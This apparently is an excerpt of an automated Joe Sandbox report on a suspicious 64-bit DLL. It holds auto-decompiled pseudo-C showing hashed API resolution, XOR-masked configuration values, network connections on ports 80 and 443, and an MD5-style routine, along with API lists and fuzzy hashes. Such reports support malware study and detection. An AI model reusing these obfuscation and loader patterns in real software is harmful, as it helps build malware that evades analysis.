                  0x180003bd6
                  0x180003be0
                  0x180003be5
                  0x180003bec
                  0x180003bf7
                  0x180003bff
                  0x180003c01
                  0x180003c21

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.264923072.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000000.00000002.264916129.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.264935259.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.264942616.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                  Similarity
                  • API ID: CloseCriticalHandleSection$CreateEvent$DeleteEnterErrorFreeHeapInitializeLastLeaveMutexObjectSingleSleepSwitchThreadWaitmemcpy
                  • String ID:
                  • API String ID: 810493412-0
                  • Opcode ID: b816b6a790a3b77e0cb1c9170e0e56660fdfce69cd924edd7d4bea04d9f1c9d6
                  • Instruction ID: da56e0963138b123f8a3a91eab94b9da458cf35c37d31fe2a2e97a6efbfc397b
                  • Opcode Fuzzy Hash: b816b6a790a3b77e0cb1c9170e0e56660fdfce69cd924edd7d4bea04d9f1c9d6
                  • Instruction Fuzzy Hash: 5F51C332301B4882EB97DF22A4117DA73A8FB8CBD8F448524AE5D47795EF38CA09C350
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 54%
                  			E00000001180002B60(void* __esi, void* __rcx, void* __r9, void* __r10, signed long long __r11) {
                  				void* __rbx;
                  				void* __rdi;
                  				void* __rsi;
                  				void* __rbp;
                  				void* _t79;
                  				signed int _t94;
                  				void* _t143;
                  				void* _t144;
                  				long long _t174;
                  				long long* _t175;
                  				long long* _t178;
                  				void* _t180;
                  				long long _t182;
                  				void* _t190;
                  				intOrPtr _t211;
                  				void* _t224;
                  				void* _t225;
                  				long long _t228;
                  				void* _t229;
                  				void* _t255;
                  				signed long long _t256;
                  
                  				_t256 = __r11;
                  				_t255 = __r10;
                  				_t144 = __esi;
                  				_t174 = _t228;
                  				_t229 = _t228 - 0x60;
                  				r12d =  *0x8000d498;
                  				 *(_t174 + 0x20) =  *(_t174 + 0x20) & 0x00000000;
                  				_t225 = __rcx;
                  				if (E00000001180002464(_t174, _t180,  *0x8000d4a0 + 0x28, __rcx) != 0) goto 0x80002bd9;
                  				_t79 = E00000001180002464(_t174, _t180,  *0x8000d4a0 + 0x20, _t225);
                  				if (_t79 == 0) goto 0x80002bd9;
                  				HeapFree(??, ??, ??);
                  				if (_t79 != 0) goto 0x80002f0d;
                  				_t190 = _t229 + 0x48;
                  				if (E00000001180008C60(_t180, _t190, _t224, _t225) != 0) goto 0x80002ed2;
                  				r9d =  *( *((intOrPtr*)(_t225 + 0x40)) + 2) & 0x0000ffff;
                  				if (_t190 - __r9 + 8 <= 0) goto 0x80002c2b;
                  				if ((r12d ^ 0xe49a1e6d) == 0) goto 0x80002c2d;
                  				E00000001180004ED8(r12d ^ 0xe49a1e6d, __r9 +  *((intOrPtr*)(_t225 + 0x40)) + 8);
                  				_t182 = _t174;
                  				goto 0x80002c2d;
                  				if (_t182 == 0) goto 0x80002ec8;
                  				_t21 = _t225 + 0xb0; // 0xb0
                  				 *((long long*)(_t229 + 0x28)) = _t182;
                  				 *(_t229 + 0x20) =  *(_t229 + 0x20) & 0x00000000;
                  				if (E000000011800022AC(_t182, _t174, _t182, _t21,  *((intOrPtr*)(_t229 + 0x48)), _t225,  *0x8000d490,  *((intOrPtr*)(_t225 + 0x30)),  *((intOrPtr*)(_t225 + 0x38))) != 0) goto 0x80002ec8;
                  				_t175 =  *((intOrPtr*)(_t225 + 0x28));
                  				 *((long long*)(_t229 + 0x40)) = _t175;
                  				if (E00000001180002370(r12d ^ 0x61f25585, _t175, _t182, _t256) != 0) goto 0x80002caf;
                  				if (E000000011800038F8( *((intOrPtr*)(_t229 + 0x38)),  *((intOrPtr*)(_t229 + 0x48)), _t229 + 0xa8) == 0) goto 0x80002caf;
                  				goto 0x80002cb8;
                  				 *(_t229 + 0xa8) = 0;
                  				E0000000118000459C(0xab05e147, _t175,  *((intOrPtr*)( *0x8000d4a0 + 0x18)));
                  				r15d = 0x7f;
                  				if (_t175 == 0) goto 0x80002cec;
                  				r9d = 0;
                  				r8d = 0;
                  				 *_t175();
                  				goto 0x80002cef;
                  				if (r15d != 0x102) goto 0x80002ec8;
                  				 *(_t225 + 0x64) = 0x3e8;
                  				if (E00000001180002370(r12d ^ 0x64d094d6, _t175, _t182, _t256) != 0) goto 0x80002d41;
                  				 *(_t229 + 0x20) =  *(_t229 + 0x20) & 0x00000000;
                  				r9d = 0;
                  				E00000001180002668(_t175, _t182, _t225, 0x180001844, _t225,  *0x8000d490,  *((intOrPtr*)(_t229 + 0x38)), _t229 + 0xb0);
                  				if (E00000001180002370(r12d ^ 0xdd4632ba, _t175, _t182, _t256) != 0) goto 0x80002d8f;
                  				if (E000000011800038F8( *((intOrPtr*)(_t229 + 0x38)), 0x180001844, _t229 + 0xa8) == 0) goto 0x80002d8f;
                  				_t94 =  *(_t229 + 0xa8);
                  				if (_t94 == 0) goto 0x80002d8f;
                  				 *(_t225 + 0x64) = _t94 * 0x3e8;
                  				if (E00000001180002370(r12d ^ 0x705ce798, _t175, _t182, _t256) != 0) goto 0x80002dd2;
                  				if (E000000011800038F8( *((intOrPtr*)(_t229 + 0x38)), 0x180001844, _t229 + 0xa8) == 0) goto 0x80002dd2;
                  				goto 0x80002ddb;
                  				 *(_t229 + 0xa8) = 0;
                  				r12d = r12d ^ 0xe5c7ba87;
                  				if (E00000001180002370(r12d, _t175, _t182, _t256) != 0) goto 0x80002e40;
                  				if (E000000011800038F8( *((intOrPtr*)(_t229 + 0x38)), 0x180001844, _t229 + 0xb8) == 0) goto 0x80002e40;
                  				GetSystemTimeAsFileTime(??);
                  				r11d =  *((intOrPtr*)(_t229 + 0xb8));
                  				 *((intOrPtr*)(_t225 + 0x60)) = r11d;
                  				_t178 = _t256 * 0x23c34600 +  *((intOrPtr*)(_t229 + 0x50));
                  				 *((long long*)(_t225 + 0x58)) = _t178;
                  				if (E00000001180007DBC(0, E000000011800038F8( *((intOrPtr*)(_t229 + 0x38)), 0x180001844, _t229 + 0xb8), _t225, _t229 + 0x58, _t229 + 0x30) != 0) goto 0x80002e68;
                  				r8d =  *((intOrPtr*)(_t229 + 0x30));
                  				E0000000118000137C(_t144, _t182, _t225,  *((intOrPtr*)(_t229 + 0x58)), _t255);
                  				E0000000118000459C(0xab05e147, _t178,  *((intOrPtr*)( *0x8000d4a0 + 0x18)));
                  				if (_t178 == 0) goto 0x80002e97;
                  				r8d = 0;
                  				r9d = 0;
                  				r9d = r9d * 0x3e8;
                  				 *_t178();
                  				goto 0x80002e9a;
                  				_t143 = r15d;
                  				if (_t143 != 0) goto 0x80002e40;
                  				if ( *((intOrPtr*)(_t225 + 0x50)) == 0) goto 0x80002ec8;
                  				E00000001180007950(0xab05e147,  *((intOrPtr*)( *0x8000d4a0 + 8)),  *((intOrPtr*)(_t225 + 0x50)), _t224,  *((intOrPtr*)(_t225 + 0x50)),  *0x8000d490);
                  				HeapFree(??, ??, ??);
                  				E00000001180002620();
                  				_t211 =  *0x8000d4a0;
                  				if ( *((intOrPtr*)(_t211 + 0x20)) == 0) goto 0x80002ef8;
                  				HeapFree(??, ??, ??);
                  				if ( *((intOrPtr*)(_t211 + 0x28)) == 0) goto 0x80002f0d;
                  				HeapFree(??, ??, ??);
                  				asm("lock inc ecx");
                  				return _t143;
                  			}
























                  0x180002b60
                  0x180002b60
                  0x180002b60
                  0x180002b60
                  0x180002b6d
                  0x180002b7f
                  0x180002b86
                  0x180002b8a
                  0x180002ba9
                  0x180002bb7
                  0x180002bc0
                  0x180002bd3
                  0x180002bdb
                  0x180002be1
                  0x180002bef
                  0x180002bfc
                  0x180002c11
                  0x180002c1a
                  0x180002c21
                  0x180002c26
                  0x180002c29
                  0x180002c30
                  0x180002c43
                  0x180002c4a
                  0x180002c4f
                  0x180002c5d
                  0x180002c63
                  0x180002c80
                  0x180002c8c
                  0x180002ca4
                  0x180002cad
                  0x180002cb1
                  0x180002cc1
                  0x180002cc6
                  0x180002ccf
                  0x180002ce0
                  0x180002ce3
                  0x180002ce6
                  0x180002cea
                  0x180002cf5
                  0x180002d14
                  0x180002d22
                  0x180002d29
                  0x180002d36
                  0x180002d3c
                  0x180002d61
                  0x180002d79
                  0x180002d7b
                  0x180002d84
                  0x180002d8c
                  0x180002daf
                  0x180002dc7
                  0x180002dd0
                  0x180002dd4
                  0x180002ddb
                  0x180002dfc
                  0x180002e14
                  0x180002e1b
                  0x180002e21
                  0x180002e2c
                  0x180002e37
                  0x180002e3c
                  0x180002e54
                  0x180002e56
                  0x180002e63
                  0x180002e71
                  0x180002e79
                  0x180002e7b
                  0x180002e7e
                  0x180002e8a
                  0x180002e91
                  0x180002e95
                  0x180002e97
                  0x180002e9c
                  0x180002ea5
                  0x180002eb5
                  0x180002ec2
                  0x180002ecd
                  0x180002ed2
                  0x180002ee3
                  0x180002eeb
                  0x180002eff
                  0x180002f07
                  0x180002f0d
                  0x180002f23

                  APIs
                    • Part of subcall function 0000000180002464: LoadLibraryA.KERNELBASE(?,?,?,0000000180008BB4,?,?,00000000,000000018000510D), ref: 0000000180002476
                    • Part of subcall function 0000000180002464: FreeLibrary.KERNEL32(?,?,?,0000000180008BB4,?,?,00000000,000000018000510D), ref: 00000001800024A7
                  • HeapFree.KERNEL32(?,?,?,?,?,?,00000000,00000000), ref: 0000000180002BD3
                  • GetSystemTimeAsFileTime.KERNEL32 ref: 0000000180002E1B
                  • HeapFree.KERNEL32 ref: 0000000180002EC2
                  • HeapFree.KERNEL32(?,?,?,?,?,?,00000000,00000000), ref: 0000000180002EEB
                  • HeapFree.KERNEL32(?,?,?,?,?,?,00000000,00000000), ref: 0000000180002F07
                  Memory Dump Source
                  • Source File: 00000000.00000002.264923072.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000000.00000002.264916129.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.264935259.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.264942616.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                  Similarity
                  • API ID: Free$Heap$LibraryTime$FileLoadSystem
                  • String ID:
                  • API String ID: 1415693639-0
                  • Opcode ID: 5e368ffbea44e81b77d41e8b41b472461b0af584182af94ce1e612372c450cfb
                  • Instruction ID: d455ad72a2173ea311d53c287058b5208197830efbff1c216518b590d8193917
                  • Opcode Fuzzy Hash: 5e368ffbea44e81b77d41e8b41b472461b0af584182af94ce1e612372c450cfb
                  • Instruction Fuzzy Hash: A5A15172204B8996EBA2DB66E4407DA73A5F78D7D4F448022FA4D47A95DF38C64AC700
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 26%
                  			E000000011800027D4(long long __rbx, intOrPtr* __rcx, void* __rdx) {
                  				void* __rdi;
                  				void* __rsi;
                  				void* __rbp;
                  				void* _t100;
                  				long long* _t119;
                  				long long* _t120;
                  				long long* _t121;
                  				long long* _t122;
                  				long long* _t123;
                  				void* _t151;
                  				void* _t152;
                  				intOrPtr* _t153;
                  				void* _t155;
                  				void* _t158;
                  				long long* _t161;
                  				void* _t163;
                  				void* _t164;
                  				long _t176;
                  				void* _t178;
                  				void* _t181;
                  				void* _t184;
                  
                  				_t123 = __rbx;
                  				 *((long long*)(_t163 + 0x10)) = __rbx;
                  				 *(_t163 + 0x18) = r8d;
                  				_t164 = _t163 - 0x50;
                  				_t119 =  *0x8000d4a0;
                  				_t156 =  *__rcx;
                  				_t153 = __rcx;
                  				r15d = r9d;
                  				E00000001180007B04(__rbx, __rdx, __rcx,  *__rcx, _t158, __rdx, _t184, _t181);
                  				if (_t119 == _t123) goto 0x80002a78;
                  				_t100 =  *((char*)(_t153 + 0x75)) - 6;
                  				_t5 = _t123 + 4; // 0x4
                  				r12d = _t5;
                  				if (_t100 > 0) goto 0x8000283e;
                  				if (_t100 != 0) goto 0x80002835;
                  				if ( *((char*)(_t153 + 0x74)) - 2 > 0) goto 0x8000283e;
                  				 *((intOrPtr*)(_t164 + 0x90)) = 0;
                  				goto 0x80002846;
                  				 *((intOrPtr*)(_t164 + 0x90)) = r12d;
                  				E0000000118000459C(0x3fe3c8ba, _t119,  *((intOrPtr*)(_t156 + 0x50)));
                  				if (_t119 == _t123) goto 0x80002871;
                  				r9d = 0;
                  				r8d = 0;
                  				 *((intOrPtr*)(_t164 + 0x20)) = 0;
                  				 *_t119();
                  				goto 0x80002874;
                  				_t120 = _t123;
                  				 *((long long*)(_t153 + 0x28)) = _t120;
                  				HeapFree(_t178, _t176, _t152);
                  				if ( *((intOrPtr*)(_t153 + 0x28)) == _t123) goto 0x80002a78;
                  				if ( *((intOrPtr*)(_t164 + 0xa0)) == 0) goto 0x800028ce;
                  				E0000000118000459C(0xe7f09937, _t120,  *((intOrPtr*)(_t156 + 0x50)));
                  				if (_t120 == _t123) goto 0x800028c4;
                  				_t17 = _t164 + 0xa0; // 0x12
                  				r9d = r12d;
                  				 *_t120();
                  				goto 0x800028c6;
                  				if (0 == 0) goto 0x80002a78;
                  				E00000001180007B04(_t123,  *((intOrPtr*)(_t153 + 8)), _t153, _t156, _t119, _t17, _t155, _t158);
                  				if (_t120 == _t123) goto 0x80002a78;
                  				 *((intOrPtr*)(_t164 + 0x90)) = 0x100;
                  				if ( *((intOrPtr*)(_t164 + 0xb0)) == 0) goto 0x80002938;
                  				 *((intOrPtr*)(_t164 + 0x40)) = 0xaa0;
                  				E0000000118000459C(0xe7f09937, _t120,  *((intOrPtr*)(_t156 + 0x50)));
                  				if (_t120 == _t123) goto 0x80002927;
                  				r9d = r12d;
                  				 *_t120();
                  				asm("bts dword [esp+0x90], 0x17");
                  				r12d = 0x1bb;
                  				goto 0x8000293e;
                  				r12d = 0x50;
                  				E0000000118000459C(0x7dda0345, _t120,  *((intOrPtr*)(_t156 + 0x50)));
                  				if (_t120 == _t123) goto 0x80002963;
                  				r9d = 0;
                  				r8d = r12w & 0xffffffff;
                  				 *_t120();
                  				goto 0x80002966;
                  				_t121 = _t123;
                  				 *((long long*)(_t153 + 0x30)) = _t121;
                  				HeapFree(??, ??, ??);
                  				if ( *((intOrPtr*)(_t153 + 0x30)) == _t123) goto 0x80002a78;
                  				E00000001180007B04(_t123,  *((intOrPtr*)(_t153 + 0x10)), _t153, _t156, _t120, _t120);
                  				_t161 = _t121;
                  				if (_t121 == _t123) goto 0x80002a78;
                  				E0000000118000459C(0xaa9d9fc1, _t121,  *((intOrPtr*)(_t156 + 0x50)));
                  				if (_t121 == _t123) goto 0x800029ed;
                  				_t151 =  !=  ?  *0x8000d490 + 0x180011260 :  *0x8000d490 + 0x180011278;
                  				r9d = 0;
                  				 *((intOrPtr*)(_t164 + 0x30)) =  *((intOrPtr*)(_t164 + 0x90));
                  				 *((long long*)(_t164 + 0x28)) = _t123;
                  				 *((long long*)(_t164 + 0x20)) = _t123;
                  				 *_t121();
                  				goto 0x800029f0;
                  				_t122 = _t123;
                  				 *((long long*)(_t153 + 0x38)) = _t122;
                  				HeapFree(??, ??, ??);
                  				if ( *((intOrPtr*)(_t153 + 0x38)) == _t123) goto 0x80002a78;
                  				 *((intOrPtr*)(_t164 + 0x44)) = 4;
                  				E0000000118000459C(0x677ec78c, _t122,  *((intOrPtr*)(_t156 + 0x50)));
                  				_t45 = _t161 + 0x1b; // 0x1f
                  				r12d = _t45;
                  				if (_t122 == _t123) goto 0x80002a40;
                  				 *_t122();
                  				goto 0x80002a42;
                  				if (0 == 0) goto 0x80002a80;
                  				asm("bts dword [esp+0x90], 0x8");
                  				E0000000118000459C(0xe7f09937, _t122,  *((intOrPtr*)(_t156 + 0x50)));
                  				if (_t122 == _t123) goto 0x80002a80;
                  				r9d = 4;
                  				 *_t122();
                  				goto 0x80002a80;
                  				return GetLastError();
                  			}
























                  0x1800027d4
                  0x1800027d4
                  0x1800027d9
                  0x1800027e9
                  0x1800027ed
                  0x1800027f4
                  0x180002805
                  0x18000280d
                  0x180002810
                  0x18000281d
                  0x180002823
                  0x180002827
                  0x180002827
                  0x18000282b
                  0x18000282d
                  0x180002833
                  0x180002835
                  0x18000283c
                  0x18000283e
                  0x18000284f
                  0x180002857
                  0x180002860
                  0x180002863
                  0x180002869
                  0x18000286d
                  0x18000286f
                  0x180002871
                  0x18000287c
                  0x180002880
                  0x18000288a
                  0x180002897
                  0x1800028a2
                  0x1800028aa
                  0x1800028b0
                  0x1800028b8
                  0x1800028c0
                  0x1800028c2
                  0x1800028c8
                  0x1800028d4
                  0x1800028df
                  0x1800028e5
                  0x1800028f7
                  0x180002902
                  0x18000290a
                  0x180002912
                  0x18000291d
                  0x180002925
                  0x180002927
                  0x180002930
                  0x180002936
                  0x180002938
                  0x180002947
                  0x18000294f
                  0x180002955
                  0x180002958
                  0x18000295f
                  0x180002961
                  0x180002963
                  0x18000296e
                  0x180002972
                  0x18000297c
                  0x180002988
                  0x18000298d
                  0x180002993
                  0x1800029a2
                  0x1800029aa
                  0x1800029c9
                  0x1800029d4
                  0x1800029d7
                  0x1800029df
                  0x1800029e4
                  0x1800029e9
                  0x1800029eb
                  0x1800029ed
                  0x1800029f8
                  0x1800029fc
                  0x180002a06
                  0x180002a12
                  0x180002a1a
                  0x180002a1f
                  0x180002a1f
                  0x180002a26
                  0x180002a3c
                  0x180002a3e
                  0x180002a44
                  0x180002a46
                  0x180002a58
                  0x180002a60
                  0x180002a6e
                  0x180002a74
                  0x180002a76
                  0x180002a99

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.264923072.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000000.00000002.264916129.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.264935259.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.264942616.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                  Similarity
                  • API ID: Heap$Free$AllocErrorLastlstrlenmemset
                  • String ID: P
                  • API String ID: 1242601240-3110715001
                  • Opcode ID: 6e262a4d51cbb5cdb0bca898ebc316c77d6222acc70f3ffea50beea523427e07
                  • Instruction ID: b9b39858d45b2fed8cd52d627653eb03beea5c07a2efbf285fd96505e9c46d20
                  • Opcode Fuzzy Hash: 6e262a4d51cbb5cdb0bca898ebc316c77d6222acc70f3ffea50beea523427e07
                  • Instruction Fuzzy Hash: E2718B7230468897EBA2DF62A8443DA73A0F78DBC4F488425AF4E47B46CF38D658C710
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                    • Part of subcall function 000000018000958C: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000001800090B2), ref: 0000000180009595
                    • Part of subcall function 000000018000958C: Sleep.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000001800090B2), ref: 00000001800095A7
                  • GetSystemTimeAsFileTime.KERNEL32 ref: 000000018000461B
                  • LeaveCriticalSection.KERNEL32 ref: 0000000180004653
                  Memory Dump Source
                  • Source File: 00000000.00000002.264923072.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000000.00000002.264916129.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.264935259.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.264942616.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                  Similarity
                  • API ID: CriticalSectionTime$EnterFileLeaveSleepSystem
                  • String ID:
                  • API String ID: 1722460308-0
                  • Opcode ID: 2dd8831bc9f43de6d569c4ecde058db3d0dea22e16b3234fabfd63794af3f721
                  • Instruction ID: 4ead8fb80c48ce341bb99ce9a75b77310841507c5221c0524d6be850b07dbd1f
                  • Opcode Fuzzy Hash: 2dd8831bc9f43de6d569c4ecde058db3d0dea22e16b3234fabfd63794af3f721
                  • Instruction Fuzzy Hash: 08017933718A8497D796CF21E0503DA77A0F799B84F885012EB8947A55DF38DAB9C740
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 56%
                  			E00000001180009C54(void* __eflags, void* __rax, long long __rbx, long long __rcx, void* __rdx, void* __r9, void* __r10, void* __r11, void* _a8, long long _a16, intOrPtr _a24) {
                  				void* _v60;
                  				void* _v64;
                  				intOrPtr _v68;
                  				void* _v72;
                  				void* _v76;
                  				intOrPtr _v80;
                  				intOrPtr _v84;
                  				void* _v88;
                  				intOrPtr _v92;
                  				void* _v96;
                  				intOrPtr _v100;
                  				void* _v104;
                  				void* _v108;
                  				void* _v112;
                  				intOrPtr _v116;
                  				intOrPtr _t385;
                  				signed int _t388;
                  				signed int _t567;
                  				signed int _t596;
                  				signed char* _t610;
                  				signed char* _t611;
                  				void* _t612;
                  				void* _t613;
                  				signed int* _t616;
                  				signed int* _t617;
                  				void* _t619;
                  				intOrPtr* _t620;
                  
                  				_a16 = __rbx;
                  				_a8 = __rcx;
                  				r10d =  *(__rcx + 4);
                  				r11d =  *((intOrPtr*)(__rcx + 8));
                  				_a24 =  *((intOrPtr*)(__rcx));
                  				_t610 = __rdx + 2;
                  				_t616 = _t613 - 0x40;
                  				r9d = 0x10;
                  				_t611 =  &(_t610[4]);
                  				 *_t616 = (((_t610[1] & 0x000000ff) << 0x00000008 |  *_t610 & 0x000000ff) << 0x00000008 |  *(_t611 - 5) & 0x000000ff) << 0x00000008 |  *(_t611 - 6) & 0x000000ff;
                  				_t617 =  &(_t616[1]);
                  				_t619 = __r9 - 1;
                  				if (__eflags != 0) goto 0x80009c8f;
                  				r15d = _v100;
                  				r12d = _v92;
                  				asm("rol edx, 0x7");
                  				r8d = __rcx + __rbx - 0x173848aa;
                  				asm("inc ecx");
                  				r8d = r8d + __rcx + _t612 - 0x28955b88 + r10d;
                  				r9d = __rcx + __r11 + 0x242070db;
                  				asm("inc ecx");
                  				r9d = r9d + r8d;
                  				r10d = __rcx + __r10 - 0x3e423112;
                  				asm("inc ecx");
                  				r10d = r10d + r9d;
                  				r11d = __rcx + _t611 - 0xa83f051;
                  				asm("inc ecx");
                  				r11d = r11d + r10d;
                  				asm("rol edx, 0xc");
                  				r8d = __rcx + _t619 - 0x57cfb9ed;
                  				asm("inc ecx");
                  				r8d = r8d + __rcx +  &(_t617[0x11e1f18a]) + r11d;
                  				r9d = __rcx + __r10 - 0x2b96aff;
                  				asm("inc ecx");
                  				r13d = _v80;
                  				r14d = _v68;
                  				r9d = r9d + r8d;
                  				r10d = __rcx + __r11 + 0x698098d8;
                  				asm("inc ecx");
                  				r10d = r10d + r9d;
                  				asm("rol edx, 0xc");
                  				asm("ror edi, 0xf");
                  				r9d = __rcx + _t619 - 0x76a32842;
                  				asm("inc ecx");
                  				r9d = r9d + __rcx + _t617 - 0xa44f + __rcx + _t611 - 0x74bb0851 + r10d;
                  				r11d = __rcx + __r10 + 0x6b901122;
                  				asm("inc ecx");
                  				r11d = r11d + r9d;
                  				asm("rol ebx, 0xc");
                  				_t388 = __rcx + _t611 - 0x2678e6d + r11d;
                  				r8d = _t388;
                  				r8d =  !r8d;
                  				r10d = __rcx + _t612 - 0x5986bc72;
                  				asm("inc ecx");
                  				r10d = r10d + _t388;
                  				r8d = r8d & r10d;
                  				r9d = __rcx + _t619 + 0x49b40821;
                  				asm("inc ecx");
                  				r9d = r9d + r10d;
                  				r8d = r8d | _t388 & r9d;
                  				r8d = r8d + _v116;
                  				r11d = _t617 + __r11 - 0x9e1da9e;
                  				asm("inc ecx");
                  				r11d = r11d + r9d;
                  				r8d =  &(_t611[__rbx - 0x3fbf4cc0]);
                  				asm("inc ecx");
                  				r8d = r8d + r11d;
                  				asm("rol edx, 0xe");
                  				r10d = __rcx + _t619 - 0x16493856;
                  				asm("inc ecx");
                  				r10d = r10d + __rcx + __r10 + 0x265e5a51 + r8d;
                  				r9d = __rcx + __r11 - 0x29d0efa3;
                  				asm("inc ecx");
                  				r9d = r9d + r10d;
                  				r11d = __rcx +  &(_t617[0x910514]);
                  				asm("inc ecx");
                  				r11d = r11d + r9d;
                  				r8d = __rcx + _t611 - 0x275e197f;
                  				asm("inc ecx");
                  				r8d = r8d + r11d;
                  				asm("ror edx, 0xc");
                  				r10d = __rcx + _t619 + 0x21e1cde6;
                  				asm("inc ecx");
                  				r10d = r10d + __rcx + __r10 - 0x182c0438 + r8d;
                  				r9d = __rcx + __r11 - 0x3cc8f82a;
                  				asm("inc ecx");
                  				r9d = r9d + r10d;
                  				r11d = __rcx + _t617 - 0xb2af279;
                  				asm("inc ecx");
                  				r11d = r11d + r9d;
                  				asm("ror ebx, 0xc");
                  				asm("rol edx, 0x5");
                  				r8d = __rcx + _t619 - 0x3105c08;
                  				asm("inc ecx");
                  				r8d = r8d + __rcx + __r10 - 0x561c16fb + __rcx +  &(_t611[0x455a14ed]) + r11d;
                  				r9d = __rcx + __r11 + 0x676f02d9;
                  				asm("inc ecx");
                  				r9d = r9d + r8d;
                  				r10d = __rcx + __rbx - 0x72d5b376;
                  				asm("inc ecx");
                  				r10d = r10d + r9d;
                  				asm("rol edx, 0x4");
                  				r8d = __rax + _t617 - 0x788e097f;
                  				asm("inc ecx");
                  				r8d = r8d + __rax + _t611 - 0x5c6be + r10d;
                  				r9d = __rax + _t619 + 0x6d9d6122;
                  				asm("inc ecx");
                  				r9d = r9d + r8d;
                  				r10d = __rax + __r10 - 0x21ac7f4;
                  				asm("inc ecx");
                  				r10d = r10d + r9d;
                  				r11d = __rcx + _t611 - 0x5b4115bc;
                  				asm("inc ecx");
                  				r11d = r11d + r10d;
                  				asm("rol edx, 0xb");
                  				r8d = __rax + _t619 - 0x944b4a0;
                  				asm("inc ecx");
                  				r8d = r8d + __rax +  &(_t617[0x12f7b3ea]) + r11d;
                  				r9d = __rax + __r10 - 0x41404390;
                  				asm("inc ecx");
                  				r9d = r9d + r8d;
                  				r10d = __rcx + __r11 + 0x289b7ec6;
                  				asm("inc ecx");
                  				r10d = r10d + r9d;
                  				r11d = __rax + _t611 - 0x155ed806;
                  				asm("inc ecx");
                  				r11d = r11d + r10d;
                  				r8d = __rax + _t617 - 0x2b10cf7b;
                  				asm("inc ecx");
                  				r8d = r8d + r11d;
                  				asm("ror edx, 0x9");
                  				r9d = __rcx + __r10 - 0x262b2fc7;
                  				asm("inc ecx");
                  				r9d = r9d + __rax + _t619 + 0x4881d05 + r8d;
                  				asm("rol ecx, 0xb");
                  				r10d = __rax +  &(_t617[0x7e89f3e]);
                  				asm("inc ecx");
                  				r10d = r10d + __rax + __r11 - 0x1924661b + r9d;
                  				r8d = __rax + _t611 - 0x3b53a99b;
                  				asm("inc ecx");
                  				r8d = r8d + r10d;
                  				asm("rol edx, 0x6");
                  				r9d = __rax + __rcx + 0x432aff97;
                  				asm("inc ecx");
                  				r9d = r9d + __rax + _t619 - 0xbd6ddbc + r8d;
                  				asm("rol ecx, 0xf");
                  				r10d = __rax + _t617 - 0x36c5fc7;
                  				asm("inc ecx");
                  				r10d = r10d + __rax + __r10 - 0x546bdc59 + r9d;
                  				r8d = __rax +  &(_t611[0x655b59c3]);
                  				asm("inc ecx");
                  				r8d = r8d + r10d;
                  				asm("rol edx, 0xa");
                  				r9d = __rax + __rcx - 0x100b83;
                  				asm("inc ecx");
                  				r9d = r9d + __rax + _t619 - 0x70f3336e + r8d;
                  				asm("ror ecx, 0xb");
                  				r10d = __rax +  &(_t617[0x1bea1f93]);
                  				asm("inc ecx");
                  				r10d = r10d + __rax + __r10 - 0x7a7ba22f + r9d;
                  				r11d = __rax + _t611 - 0x1d31920;
                  				asm("inc ecx");
                  				r11d = r11d + r10d;
                  				r9d = __rax + _t619 - 0x5cfebcec;
                  				asm("inc ecx");
                  				r9d = r9d + r11d;
                  				asm("ror ebx, 0xb");
                  				r8d = __rax + __r10 - 0x8ac817e;
                  				asm("inc ecx");
                  				r8d = r8d + __rax + __rcx + 0x4e0811a1 + r9d;
                  				asm("rol edx, 0xa");
                  				_t596 = __rax + __r11 - 0x42c50dcb + r8d;
                  				_t620 = _a8;
                  				asm("rol ecx, 0xf");
                  				r8d =  !r8d;
                  				 *_t620 = _a24 + r8d;
                  				_t567 = __rax + _t619 + 0x2ad7d2bb + _t596;
                  				r8d = r8d | _t567;
                  				r8d = r8d ^ _t596;
                  				r8d = r8d + _v84;
                  				asm("ror eax, 0xb");
                  				 *((intOrPtr*)(_t620 + 4)) = _t617 + __rbx - 0x14792c6f +  *((intOrPtr*)(_t620 + 4)) + _t567;
                  				 *((intOrPtr*)(_t620 + 8)) =  *((intOrPtr*)(_t620 + 8)) + _t567;
                  				_t385 =  *((intOrPtr*)(_t620 + 0xc)) + _t596;
                  				 *((intOrPtr*)(_t620 + 0xc)) = _t385;
                  				return _t385;
                  			}






























                  0x180009c54
                  0x180009c59
                  0x180009c6f
                  0x180009c73
                  0x180009c7a
                  0x180009c81
                  0x180009c85
                  0x180009c89
                  0x180009c96
                  0x180009cb1
                  0x180009cb4
                  0x180009cb8
